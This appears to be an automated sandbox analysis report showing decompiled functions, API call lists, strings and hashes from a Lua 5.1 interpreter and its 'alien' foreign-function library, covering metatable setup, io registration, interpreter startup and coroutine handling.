Part of subcall function 1000F6F0: luaL_openlib.LUA5.1(?,?,?,00000000), ref: 1000F701

Part of subcall function 10012D50: lua_pushvalue.LUA5.1(?,000000FF), ref: 10012D70
Part of subcall function 10012D50: lua_rawseti.LUA5.1(?,FFFFD8EF,?,?,000000FF), ref: 10012D7C
Part of subcall function 10012D50: lua_setfield.LUA5.1(?,000000FE,?), ref: 10012D8C

lua_getfield.LUA5.1(?,000000FF,popen,?,759745C0,00000000,stderr), ref: 10012C2C

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_createtable.LUA5.1(?,00000000,00000001,?,000000FF,popen,?,759745C0,00000000,stderr), ref: 10012C36
lua_pushcclosure.LUA5.1(?,10012C90,00000000,?,00000000,00000001,?,000000FF,popen,?,759745C0,00000000,stderr), ref: 10012C43
lua_setfield.LUA5.1(?,000000FE,__close,?,10012C90,00000000,?,00000000,00000001,?,000000FF,popen,?,759745C0,00000000,stderr), ref: 10012C50

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

lua_setfenv.LUA5.1(?,000000FE), ref: 10012C5B
lua_settop.LUA5.1(?,000000FE,?,000000FE), ref: 10012C63
lua_pushcclosure.LUA5.1(?,10012CD0,00000000,?,000000FE,?,000000FE), ref: 10012C70
lua_setfield.LUA5.1(?,FFFFD8EF,__close,?,10012CD0,00000000,?,000000FE,?,000000FE), ref: 10012C80

Strings

stdout, xrefs: 10012BF9
stdin, xrefs: 10012BE5
stderr, xrefs: 10012C16
__close, xrefs: 10012C48, 10012C75
popen, xrefs: 10012C24

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_setfield.$L_register.S_newlstr.lua_createtable.lua_pushcclosure.lua_pushvalue.$L_newmetatable.L_openlib.lua_getfield.lua_rawseti.lua_replace.lua_setfenv.lua_settop.
String ID: __close$popen$stderr$stdin$stdout
API String ID: 1916634189-1005838509
Opcode ID: 350cfda780ba28fc497615d5e51eff519dfa594cf1e678266218d234147ced9e
Instruction ID: f0fb1baafbd2ad158e902b372b1a94a8dc6a1045de2c60bcec3fec44c5f479f2
Opcode Fuzzy Hash: 350cfda780ba28fc497615d5e51eff519dfa594cf1e678266218d234147ced9e
Instruction Fuzzy Hash: BD11FE7855652131F412E2289D43FDE1159CF4B7A1F104200F315391DA9BB5B6D206EE

Uniqueness

Uniqueness Score: -1.00%

Function 00A231A0, Relevance: 28.0, APIs: 12, Strings: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00A231A0(void* __esi) {

				_push("alien_library");
				L00A23FAA();
				_push(4);
				_push("__gc");
				L00A23FC8();
				_push(0);
				_push(E00A22910);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xa);
				_push("__tostring");
				L00A23FC8();
				_push(0);
				_push(E00A21470);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(7);
				_push("__index");
				L00A23FC8();
				_push(0);
				_push(0);
				L00A23FBC();
				_push(1);
				_push(E00A21310);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xfffffffe);
				L00A23EF6();
				return 0;
			}

0x00a231a0
0x00a231a6
0x00a231ab
0x00a231ad
0x00a231b3
0x00a231b8
0x00a231ba
0x00a231c0
0x00a231c5
0x00a231c8
0x00a231cd
0x00a231cf
0x00a231d5
0x00a231da
0x00a231dc
0x00a231e2
0x00a231ea
0x00a231ed
0x00a231f2
0x00a231f4
0x00a231fa
0x00a231ff
0x00a23201
0x00a23204
0x00a23209
0x00a2320b
0x00a23211
0x00a23216
0x00a23219
0x00a2321e
0x00a23221
0x00a2322b

APIs

luaL_newmetatable.LUA5.1(?,alien_library,00A23E6A), ref: 00A231A6
lua_pushlstring.LUA5.1(?,__gc,00000004,?,alien_library,00A23E6A), ref: 00A231B3
lua_pushcclosure.LUA5.1(?,00A22910,00000000,?,__gc,00000004,?,alien_library,00A23E6A), ref: 00A231C0
lua_settable.LUA5.1(?,000000FD,?,00A22910,00000000,?,__gc,00000004,?,alien_library,00A23E6A), ref: 00A231C8
lua_pushlstring.LUA5.1(?,__tostring,0000000A,?,000000FD,?,00A22910,00000000,?,__gc,00000004,?,alien_library,00A23E6A), ref: 00A231D5
lua_pushcclosure.LUA5.1(?,00A21470,00000000,?,__tostring,0000000A,?,000000FD,?,00A22910,00000000,?,__gc,00000004,?,alien_library), ref: 00A231E2
lua_settable.LUA5.1(?,000000FD), ref: 00A231ED
lua_pushlstring.LUA5.1(?,__index,00000007,?,000000FD), ref: 00A231FA
lua_createtable.LUA5.1(?,00000000,00000000,?,__index,00000007,?,000000FD), ref: 00A23204
lua_pushcclosure.LUA5.1(?,00A21310,00000001,?,00000000,00000000,?,__index,00000007,?,000000FD), ref: 00A23211
lua_settable.LUA5.1(?,000000FD,?,00A21310,00000001,?,00000000,00000000,?,__index,00000007,?,000000FD), ref: 00A23219
lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00A21310,00000001,?,00000000,00000000,?,__index,00000007,?,000000FD), ref: 00A23221

Strings

alien_library, xrefs: 00A231A0
__index, xrefs: 00A231F4
__tostring, xrefs: 00A231CF
__gc, xrefs: 00A231AD

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushcclosure.lua_pushlstring.lua_settable.$L_newmetatable.lua_createtable.lua_settop.
String ID: __gc$__index$__tostring$alien_library
API String ID: 1690053519-2300885723
Opcode ID: bd9afe4dda546602d721dbbca178c3314b8c0c146cbec1014f322d83dbeb699a
Instruction ID: 2796b71d65c9f8cb8ce5f244fa455f69d9aaa4219e5fc780dd42844a8d17218d
Opcode Fuzzy Hash: bd9afe4dda546602d721dbbca178c3314b8c0c146cbec1014f322d83dbeb699a
Instruction Fuzzy Hash: F4F0F262FCEB3631DC12722D3F47F8E04692F23B65E210A30F6253C5D65A9D635610AE

Uniqueness

Uniqueness Score: -1.00%

Function 00401C20, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401C20(struct _IO_FILE** __eax, struct _IO_FILE** _a4) {
				char _v4;
				struct _IO_FILE* _v8;
				struct _IO_FILE* _v12;
				struct _IO_FILE* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct _IO_FILE* _t25;
				struct _IO_FILE _t26;
				char* _t27;
				intOrPtr _t28;
				struct _IO_FILE* _t32;
				struct _IO_FILE* _t34;
				struct _IO_FILE* _t37;
				struct _IO_FILE** _t57;
				struct _IO_FILE* _t59;
				struct _IO_FILE** _t60;
				struct _IO_FILE** _t62;
				intOrPtr* _t65;
				struct _IO_FILE** _t66;
				struct _IO_FILE** _t68;
				struct _IO_FILE** _t69;
				struct _IO_FILE** _t70;
				struct _IO_FILE** _t71;

				_t66 = _a4;
				_push(1);
				_push(_t66);
				L00401F30();
				_t57 = __eax;
				_t25 = __eax[1];
				_v12 = _t25;
				_t26 =  *_t25;
				_t68 =  &(( &_v16)[2]);
				_a4 = __eax;
				_v8 = 0;
				_v16 = 0;
				_v4 = 0;
				 *0x404378 = _t66;
				if(_t26 != 0 &&  *_t26 != 0) {
					 *0x404018 = _t26;
				}
				_push(0);
				_push(0);
				_push(_t66);
				L00401ED6();
				_push(_t66);
				L00401EDC();
				_push(0);
				_push(1);
				_push(_t66);
				L00401ED6();
				_t27 = getenv("LUA_INIT");
				_t69 =  &(_t68[8]);
				if(_t27 != 0) {
					__eflags =  *_t27 - 0x40;
					_t60 = _t66;
					if( *_t27 != 0x40) {
						_t28 = E004012F0(_t27, _t60, "=LUA_INIT");
						_t69 =  &(_t69[1]);
					} else {
						_t28 = E00401230( &(_t27[1]), _t60);
					}
				} else {
					_t28 = 0;
				}
				 *((intOrPtr*)(_t57 + 8)) = _t28;
				if(_t28 != 0) {
					L27:
					__eflags = 0;
					return 0;
				} else {
					_t59 = E00401A80( &_v16,  &_v4, _v12,  &_v8);
					_t70 =  &(_t69[1]);
					if(_t59 >= 0) {
						__eflags = _v16;
						if(_v16 != 0) {
							E00401150();
						}
						__eflags = _t59;
						_t62 = _a4;
						_t32 = _t59;
						if(_t59 <= 0) {
							_t32 =  *_t62;
						}
						_t53 = _v12;
						_t34 = E00401BA0(_t66, _v12, _t32);
						_t71 =  &(_t70[1]);
						__eflags = _t34;
						_t62[2] = _t34;
						if(_t34 != 0) {
							goto L27;
						} else {
							__eflags = _t59;
							if(_t59 != 0) {
								_t34 = E00401950(_t66, _t53, _t59);
								_t71 =  &(_t71[2]);
								_t62[2] = _t34;
							}
							__eflags = _t62[2];
							if(_t62[2] != 0) {
								goto L27;
							} else {
								__eflags = _v8;
								if(__eflags != 0) {
									L25:
									E00401750(_t59, _t66, __eflags);
									__eflags = 0;
									return 0;
								} else {
									__eflags = _t59;
									if(_t59 != 0) {
										goto L27;
									} else {
										__eflags = _v4 - _t59;
										if(_v4 != _t59) {
											goto L27;
										} else {
											__eflags = _v16 - _t59;
											if(_v16 != _t59) {
												goto L27;
											} else {
												__imp____iob_func();
												_t37 = _fileno(_t34);
												__imp___isatty(_t37);
												__eflags = _t37;
												if(_t37 == 0) {
													__eflags = 0;
													E00401230(0, _t66);
													goto L27;
												} else {
													E00401150();
													goto L25;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t65 = __imp____iob_func;
						fprintf( *_t65( *0x404018) + 0x40, "usage: %s [options] [script [args]].\nAvailable options are:\n  -e stat  execute string \'stat\'\n  -l name  require library \'name\'\n  -i       enter interactive mode after executing \'script\'\n  -v       show version information\n  --       stop handling options\n  -        execute stdin and stop handling options\n");
						fflush( *_t65() + 0x40);
						_a4[2] = 1;
						return 0;
					}
				}
			}

0x00401c25
0x00401c2b
0x00401c2d
0x00401c2e
0x00401c33
0x00401c35
0x00401c3a
0x00401c3e
0x00401c40
0x00401c45
0x00401c49
0x00401c4d
0x00401c51
0x00401c55
0x00401c5b
0x00401c61
0x00401c61
0x00401c66
0x00401c67
0x00401c68
0x00401c69
0x00401c6e
0x00401c6f
0x00401c74
0x00401c75
0x00401c77
0x00401c78
0x00401c82
0x00401c88
0x00401c8d
0x00401c93
0x00401c96
0x00401c98
0x00401cab
0x00401cb0
0x00401c9a
0x00401c9d
0x00401c9d
0x00401c8f
0x00401c8f
0x00401c8f
0x00401cb5
0x00401cb8
0x00401dba
0x00401dba
0x00401dc0
0x00401cbe
0x00401cd4
0x00401cd6
0x00401cdb
0x00401d1f
0x00401d24
0x00401d26
0x00401d26
0x00401d2b
0x00401d2d
0x00401d31
0x00401d33
0x00401d35
0x00401d35
0x00401d37
0x00401d3e
0x00401d43
0x00401d46
0x00401d48
0x00401d4b
0x00000000
0x00401d4d
0x00401d4d
0x00401d4f
0x00401d55
0x00401d5a
0x00401d5d
0x00401d5d
0x00401d60
0x00401d64
0x00000000
0x00401d66
0x00401d66
0x00401d6b
0x00401d9d
0x00401d9f
0x00401da7
0x00401dad
0x00401d6d
0x00401d6d
0x00401d6f
0x00000000
0x00401d71
0x00401d71
0x00401d75
0x00000000
0x00401d77
0x00401d77
0x00401d7b
0x00000000
0x00401d7d
0x00401d7d
0x00401d84
0x00401d8b
0x00401d94
0x00401d96
0x00401dae
0x00401db2
0x00000000
0x00401d98
0x00401d98
0x00000000
0x00401d98
0x00401d96
0x00401d7b
0x00401d75
0x00401d6f
0x00401d6b
0x00401d64
0x00401cdd
0x00401ce3
0x00401cf5
0x00401d01
0x00401d11
0x00401d1e
0x00401d1e
0x00401cdb

APIs

lua_touserdata.LUA5.1(?,00000001), ref: 00401C2E
lua_gc.LUA5.1(?,00000000,00000000), ref: 00401C69
luaL_openlibs.LUA5.1(?,?,00000000,00000000), ref: 00401C6F
lua_gc.LUA5.1(?,00000001,00000000,?,?,00000000,00000000), ref: 00401C78
getenv.MSVCR80 ref: 00401C82
__iob_func.MSVCR80 ref: 00401CEF
fprintf.MSVCR80 ref: 00401CF5
__iob_func.MSVCR80 ref: 00401CFB
fflush.MSVCR80 ref: 00401D01
__iob_func.MSVCR80 ref: 00401D7D
_fileno.MSVCR80 ref: 00401D84
_isatty.MSVCR80 ref: 00401D8B

Part of subcall function 004012F0: luaL_loadbuffer.LUA5.1(?,?,?,?), ref: 00401309
Part of subcall function 004012F0: lua_gettop.LUA5.1 ref: 00401318
Part of subcall function 004012F0: lua_pushcclosure.LUA5.1(?,Function_000010B0,00000000), ref: 00401327
Part of subcall function 004012F0: lua_insert.LUA5.1(?,00000000,?,Function_000010B0,00000000), ref: 0040132E
Part of subcall function 004012F0: signal.MSVCR80 ref: 00401340
Part of subcall function 004012F0: lua_pcall.LUA5.1(?,00000000,00000000,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401348
Part of subcall function 004012F0: signal.MSVCR80 ref: 00401353
Part of subcall function 004012F0: lua_remove.LUA5.1(?,00000000,?,00000000,00000000,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401357
Part of subcall function 004012F0: lua_gc.LUA5.1(?,00000002,00000000), ref: 0040136A
Part of subcall function 004012F0: lua_type.LUA5.1(?,000000FF), ref: 0040137A
Part of subcall function 004012F0: lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 0040138B
Part of subcall function 004012F0: lua_settop.LUA5.1(?,000000FE,00000000), ref: 004013AA

Part of subcall function 00401230: luaL_loadfile.LUA5.1 ref: 00401233
Part of subcall function 00401230: lua_gettop.LUA5.1 ref: 00401242
Part of subcall function 00401230: lua_pushcclosure.LUA5.1(?,Function_000010B0,00000000), ref: 00401251
Part of subcall function 00401230: lua_insert.LUA5.1(?,00000000,?,Function_000010B0,00000000), ref: 00401258
Part of subcall function 00401230: signal.MSVCR80 ref: 0040126A
Part of subcall function 00401230: lua_pcall.LUA5.1(?,00000000,00000000,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401272
Part of subcall function 00401230: signal.MSVCR80 ref: 0040127D
Part of subcall function 00401230: lua_remove.LUA5.1(?,00000000,?,00000000,00000000,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401281
Part of subcall function 00401230: lua_gc.LUA5.1(?,00000002,00000000), ref: 00401294
Part of subcall function 00401230: lua_type.LUA5.1(?,000000FF), ref: 004012A4
Part of subcall function 00401230: lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 004012B5
Part of subcall function 00401230: lua_settop.LUA5.1(?,000000FE,00000000), ref: 004012D4

Strings

usage: %s [options] [script [args]].Available options are: -e stat execute string 'stat' -l name require library 'name' -i enter interactive mode after executing 'script' -v show version information -- stop handling options - , xrefs: 00401CEA
=LUA_INIT, xrefs: 00401CA4
LUA_INIT, xrefs: 00401C7D

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_gc.signal$__iob_func$lua_gettop.lua_insert.lua_pcall.lua_pushcclosure.lua_remove.lua_settop.lua_tolstring.lua_type.$L_loadbuffer.L_loadfile.L_openlibs._fileno_isattyfflushfprintfgetenvlua_touserdata.
String ID: =LUA_INIT$LUA_INIT$usage: %s [options] [script [args]].Available options are: -e stat execute string 'stat' -l name require library 'name' -i enter interactive mode after executing 'script' -v show version information -- stop handling options -
API String ID: 3286308003-2816626489
Opcode ID: ddc6a243a3457ed3b2f78114d45ca22b827b8de7a25c811f0108d577ba2fabee
Instruction ID: 1661e74645fce7f76ba2d004b2b7d54c05a94a0d93ff2daf657b13c8d54a0cb2
Opcode Fuzzy Hash: ddc6a243a3457ed3b2f78114d45ca22b827b8de7a25c811f0108d577ba2fabee
Instruction Fuzzy Hash: 5241D3719002059FD710AF669C8561BB6D8EF84355F54083FF949F33A2E63CE94887AA

Uniqueness

Uniqueness Score: -1.00%

Function 00A21310, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00A21310(void* __ebx, intOrPtr _a4) {
				char _v4;
				void* _v8;
				void* __edi;
				void* __esi;
				CHAR* _t8;
				CHAR* _t11;
				struct HINSTANCE__** _t12;
				struct HINSTANCE__* _t13;
				char _t26;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				struct HINSTANCE__** _t34;
				CHAR* _t37;
				void** _t39;
				void** _t40;
				void** _t42;

				_t30 = _a4;
				_t8 =  &_v4;
				_push(_t8);
				_push(2);
				_push(_t30);
				L00A23F32();
				_t37 = _t8;
				_push(_t37);
				_push(0xffffd8ed);
				_push(_t30);
				L00A23F02();
				_push(0xffffffff);
				_push(_t30);
				L00A23F4A();
				_t39 =  &(( &_v8)[8]);
				if(_t8 == 0) {
					_t27 = malloc(_v4 + 1);
					_t40 =  &(_t39[1]);
					_v8 = _t27;
					if(_t27 == 0) {
						_push("out of memory!");
						_push(_t30);
						L00A23F26();
						return 0;
					} else {
						_t11 = _t37;
						_t28 = _t27 - _t37;
						do {
							_t26 =  *_t11;
							 *((char*)(_t28 + _t11)) = _t26;
							_t11 =  &(_t11[1]);
						} while (_t26 != 0);
						_push(__ebx);
						_t12 = E00A21110(_t11, 1, _t30, "alien_library");
						_t42 =  &(_t40[1]);
						_t34 = _t12;
						if(_t34 == 0) {
							_push("alien library expected");
							_push(1);
							_push(_t30);
							L00A23F14();
							_t42 =  &(_t42[3]);
						}
						_t13 =  *_t34;
						if(_t13 == 0) {
							_t13 = GetModuleHandleA(_t13);
						}
						if(GetProcAddress(_t13, _t37) != 0) {
							E00A21290(_t14, _t30, _t34, _t14, _v8);
							_push(0xffffffff);
							_push(_t30);
							L00A23F44();
							_push(_t37);
							_push(0xffffd8ed);
							_push(_t30);
							L00A23F3E();
							return 1;
						} else {
							E00A21080(_t30);
							free(_v8);
							_push(_t30);
							L00A23F20();
							return 0;
						}
					}
				} else {
					return 1;
				}
			}

0x00a21315
0x00a21319
0x00a2131d
0x00a2131e
0x00a21320
0x00a21321
0x00a21326
0x00a21328
0x00a21329
0x00a2132e
0x00a2132f
0x00a21334
0x00a21336
0x00a21337
0x00a2133c
0x00a21341
0x00a2135d
0x00a2135f
0x00a21364
0x00a21368
0x00a21414
0x00a21419
0x00a2141a
0x00a2142a
0x00a2136e
0x00a2136e
0x00a21370
0x00a21372
0x00a21372
0x00a21374
0x00a21377
0x00a2137a
0x00a2137e
0x00a2138b
0x00a21390
0x00a21393
0x00a21398
0x00a2139a
0x00a2139f
0x00a213a1
0x00a213a2
0x00a213a7
0x00a213a7
0x00a213aa
0x00a213ae
0x00a213b1
0x00a213b1
0x00a213c1
0x00a213ec
0x00a213f1
0x00a213f3
0x00a213f4
0x00a213f9
0x00a213fa
0x00a213ff
0x00a21400
0x00a21413
0x00a213c3
0x00a213c3
0x00a213cd
0x00a213d3
0x00a213d4
0x00a213e4
0x00a213e4
0x00a213c1
0x00a21344
0x00a2134d
0x00a2134d

APIs

luaL_checklstring.LUA5.1(?,00000002,?), ref: 00A21321
lua_getfield.LUA5.1(?,FFFFD8ED,00000000,?,00000002,?), ref: 00A2132F
lua_type.LUA5.1(?,000000FF,?,FFFFD8ED,00000000,?,00000002,?), ref: 00A21337
malloc.MSVCR80 ref: 00A21357
luaL_argerror.LUA5.1(?,00000001,alien library expected), ref: 00A213A2
GetModuleHandleA.KERNEL32(00000000), ref: 00A213B1
GetProcAddress.KERNEL32(00000000,00000000), ref: 00A213B9
free.MSVCR80(?), ref: 00A213CD
lua_error.LUA5.1(?), ref: 00A213D4

Strings

alien_library, xrefs: 00A2137F
out of memory!, xrefs: 00A21414
alien library expected, xrefs: 00A2139A

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleL_argerror.L_checklstring.ModuleProcfreelua_error.lua_getfield.lua_type.malloc
String ID: alien library expected$alien_library$out of memory!
API String ID: 769680418-2304079716
Opcode ID: 1accbbf34e2bd330210e163149887df4de37b61d6f084fe214e48af348af1bf7
Instruction ID: 65443f8f3dff89beb510d5509b3390ad82c69c5af49f92b5c6049778b3b4fa0a
Opcode Fuzzy Hash: 1accbbf34e2bd330210e163149887df4de37b61d6f084fe214e48af348af1bf7
Instruction Fuzzy Hash: 88213C33E042207BDA10677DBD42E7F73ACEF92760F444534FD04DA241F53A990652A2

Uniqueness

Uniqueness Score: -1.00%

Function 10010EC0, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010EC0(void* __ebx, void* __eflags, intOrPtr _a4) {
				char _v100;
				void* __esi;
				void* _t4;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t22;
				intOrPtr _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t23 = _a4;
				_t22 = E10001840(__eflags, _t23, 1);
				_t25 =  &_v100 + 8;
				_t34 = _t22;
				if(_t22 == 0) {
					E1000F090(__ebx, _t23, _t34, _t23, 1, "coroutine expected");
					_t25 = _t25 + 0xc;
				}
				if(_t23 != _t22) {
					_t4 = E10002270(_t22);
					_t26 = _t25 + 4;
					_t5 = _t4;
					__eflags = _t5;
					if(_t5 == 0) {
						_t7 = E10003F40(_t22, 0,  &_v100);
						_t27 = _t26 + 0xc;
						__eflags = _t7;
						if(_t7 <= 0) {
							_t8 = E10001150(_t22);
							_t26 = _t27 + 4;
							__eflags = _t8;
							if(_t8 != 0) {
								goto L11;
							} else {
								E10001930(_t23, "dead", 4);
								return 1;
							}
						} else {
							E10001930(_t23, "normal", 6);
							return 1;
						}
					} else {
						__eflags = _t5 == 1;
						if(_t5 == 1) {
							L11:
							E10001930(_t23, "suspended", 9);
							return 1;
						} else {
							E10001930(_t23, "dead", 4);
							return 1;
						}
					}
				} else {
					E10001930(_t23, "running", 7);
					return 1;
				}
			}

0x10010ec4
0x10010ed1
0x10010ed3
0x10010ed6
0x10010ed8
0x10010ee2
0x10010ee7
0x10010ee7
0x10010eec
0x10010f0a
0x10010f0f
0x10010f12
0x10010f12
0x10010f15
0x10010f3d
0x10010f42
0x10010f45
0x10010f47
0x10010f65
0x10010f6a
0x10010f6d
0x10010f6f
0x00000000
0x10010f71
0x10010f79
0x10010f8b
0x10010f8b
0x10010f49
0x10010f51
0x10010f63
0x10010f63
0x10010f17
0x10010f17
0x10010f18
0x10010f8c
0x10010f94
0x10010fa6
0x10010f1a
0x10010f22
0x10010f34
0x10010f34
0x10010f18
0x10010eee
0x10010ef6
0x10010f08
0x10010f08

APIs

lua_tothread.LUA5.1(?,00000001), ref: 10010ECC
luaL_argerror.LUA5.1(?,00000001,coroutine expected), ref: 10010EE2

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

lua_pushlstring.LUA5.1(?,running,00000007), ref: 10010EF6
lua_status.LUA5.1(00000000), ref: 10010F0A
lua_pushlstring.LUA5.1(?,dead,00000004), ref: 10010F22

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

lua_getstack.LUA5.1(00000000,00000000,?), ref: 10010F3D
lua_pushlstring.LUA5.1(?,normal,00000006), ref: 10010F51
lua_pushlstring.LUA5.1(?,suspended,00000009), ref: 10010F94

Strings

suspended, xrefs: 10010F8E
running, xrefs: 10010EF0
normal, xrefs: 10010F4B
coroutine expected, xrefs: 10010EDA
dead, xrefs: 10010F1C, 10010F73

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushlstring.$lua_getstack.$L_argerror.L_error.S_newlstr.lua_status.lua_tothread.
String ID: coroutine expected$dead$normal$running$suspended
API String ID: 1561646929-2864139186
Opcode ID: 356d690f21f3ff29daeca7f75d2d5b8f6c760100f8beeefba22452062e7dfd1b
Instruction ID: f84edd6b95c96bb26bd03c2649ffb15355f15186745eaf1d3b43832fb61f0e6d
Opcode Fuzzy Hash: 356d690f21f3ff29daeca7f75d2d5b8f6c760100f8beeefba22452062e7dfd1b
Instruction Fuzzy Hash: 6411B6AEF1421032F521E1186C43FDB3244CBD06D8F490035FA48AE287F6AAE79B41DB

Uniqueness

Uniqueness Score: -1.00%

Function 10010CE0, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10010CE0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t4;
				void* _t5;
				void* _t7;
				void* _t9;
				void* _t15;
				void* _t20;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t28;

				_t19 = _a12;
				_t23 = _a8;
				_t4 = E10001030(_a8, _a12);
				_t22 = _a4;
				_t25 = _t24 + 8;
				if(_t4 == 0) {
					_push("too many arguments to resume");
					_push(_t22);
					E1000F230();
					_t25 = _t25 + 8;
				}
				_t5 = E10002270(_t23);
				_t26 = _t25 + 4;
				if(_t5 != 0) {
					L5:
					E10001090(_t22, _t23, _t19);
					_t7 = E10005920(_t21, _t23, _t19);
					_t27 = _t26 + 0x14;
					if(_t7 == 0 || _t7 == 1) {
						_t20 = E10001150(_t23);
						_t9 = E10001030(_t22, _t20);
						_t28 = _t27 + 0xc;
						if(_t9 == 0) {
							_push("too many results to resume");
							_push(_t22);
							E1000F230();
							_t28 = _t28 + 8;
						}
						E10001090(_t23, _t22, _t20);
						return _t20;
					} else {
						return E10001090(_t23, _t22, 1) | 0xffffffff;
					}
				} else {
					_t15 = E10001150(_t23);
					_t26 = _t26 + 4;
					if(_t15 != 0) {
						goto L5;
					} else {
						return E10001930(_t22, "cannot resume dead coroutine", 0x1c) | 0xffffffff;
					}
				}
			}

0x10010ce1
0x10010ce6
0x10010ced
0x10010cf2
0x10010cf6
0x10010cfb
0x10010cfd
0x10010d02
0x10010d03
0x10010d08
0x10010d08
0x10010d0c
0x10010d11
0x10010d16
0x10010d3c
0x10010d3f
0x10010d46
0x10010d4b
0x10010d50
0x10010d70
0x10010d74
0x10010d79
0x10010d7e
0x10010d80
0x10010d85
0x10010d86
0x10010d8b
0x10010d8b
0x10010d91
0x10010d9e
0x10010d57
0x10010d69
0x10010d69
0x10010d18
0x10010d19
0x10010d1e
0x10010d23
0x00000000
0x10010d25
0x10010d3b
0x10010d3b
0x10010d23

APIs

lua_checkstack.LUA5.1(?,?,00000000,?,?,10010C96,?,00000000,-00000001,?), ref: 10010CED
lua_xmove.LUA5.1(?,?,?,?,-00000001,?), ref: 10010D3F
lua_resume.LUA5.1(?,?,?,?,?,?,-00000001,?), ref: 10010D46
lua_xmove.LUA5.1(?,?,00000001,?,?,?,?,?,?,-00000001,?), ref: 10010D5B
lua_gettop.LUA5.1(?,?,?,?,?,?,?,-00000001,?), ref: 10010D6B
lua_checkstack.LUA5.1(?,00000000,?,?,?,?,?,?,?,-00000001,?), ref: 10010D74
luaL_error.LUA5.1(?,too many arguments to resume,-00000001,?), ref: 10010D03

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_status.LUA5.1(?,-00000001,?), ref: 10010D0C
lua_gettop.LUA5.1(?,?,-00000001,?), ref: 10010D19
lua_pushlstring.LUA5.1(?,cannot resume dead coroutine,0000001C,?,?,-00000001,?), ref: 10010D2D
